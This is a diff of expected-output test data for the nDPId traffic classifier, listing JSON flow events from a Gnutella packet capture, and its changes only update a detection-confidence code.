00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287511,"flow_last_seen":287824,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"180.218.135.222","src_port":28681,"dst_port":4548,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287511,"flow_last_seen":287824,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"180.218.135.222","src_port":28681,"dst_port":4548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95716,"flow_last_seen":287440,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2001,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95716,"flow_last_seen":287440,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2001,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287426,"flow_last_seen":287647,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"223.16.170.108","src_port":28681,"dst_port":23458,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287426,"flow_last_seen":287647,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"223.16.170.108","src_port":28681,"dst_port":23458,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287619,"flow_last_seen":287619,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"223.16.83.5","src_port":28681,"dst_port":9128,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3475,12 +3475,12 @@ 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287524,"flow_last_seen":287524,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":28681,"dst_port":44616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287698,"flow_last_seen":287698,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.91.30.216","src_port":28681,"dst_port":61635,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287698,"flow_last_seen":287698,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.91.30.216","src_port":28681,"dst_port":61635,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287579,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2031,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287579,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2031,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00582{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90864,"flow_last_seen":287337,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1242,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":28681,"dst_port":53489,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00567{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90864,"flow_last_seen":287337,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1242,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":28681,"dst_port":53489,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287589,"flow_last_seen":287589,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":28681,"dst_port":64731,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287589,"flow_last_seen":287589,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":28681,"dst_port":64731,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90039,"flow_last_seen":287415,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5624,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90039,"flow_last_seen":287415,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5624,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287859,"flow_last_seen":287859,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":28681,"dst_port":4364,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287859,"flow_last_seen":287859,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":28681,"dst_port":4364,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287648,"flow_last_seen":287648,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":55050,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3507,7 +3507,7 @@ 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287320,"flow_last_seen":287320,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.250.32","src_port":28681,"dst_port":52660,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287466,"flow_last_seen":287466,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.10.174.159","src_port":28681,"dst_port":4841,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287466,"flow_last_seen":287466,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.10.174.159","src_port":28681,"dst_port":4841,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":89829,"flow_last_seen":287526,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":89829,"flow_last_seen":287526,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287314,"flow_last_seen":287314,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"209.204.207.5","src_port":28681,"dst_port":49256,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287314,"flow_last_seen":287314,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"209.204.207.5","src_port":28681,"dst_port":49256,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287858,"flow_last_seen":287858,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.91.201","src_port":28681,"dst_port":4297,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3554,7 +3554,7 @@ 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287681,"flow_last_seen":287681,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":28681,"dst_port":59978,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287525,"flow_last_seen":287525,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":28681,"dst_port":53195,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287525,"flow_last_seen":287525,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":28681,"dst_port":53195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":174303,"flow_last_seen":287509,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1210,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":28681,"dst_port":10825,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":174303,"flow_last_seen":287509,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1210,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":28681,"dst_port":10825,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287424,"flow_last_seen":287424,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":42925,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287424,"flow_last_seen":287424,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":42925,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287387,"flow_last_seen":287752,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":28681,"dst_port":8890,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3575,7 +3575,7 @@ 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287316,"flow_last_seen":287316,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":28681,"dst_port":8070,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287442,"flow_last_seen":287442,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":28681,"dst_port":65274,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287442,"flow_last_seen":287442,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":28681,"dst_port":65274,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90005,"flow_last_seen":287678,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5605,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90005,"flow_last_seen":287678,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5605,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287498,"flow_last_seen":287719,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":28681,"dst_port":15068,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287498,"flow_last_seen":287719,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":28681,"dst_port":15068,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 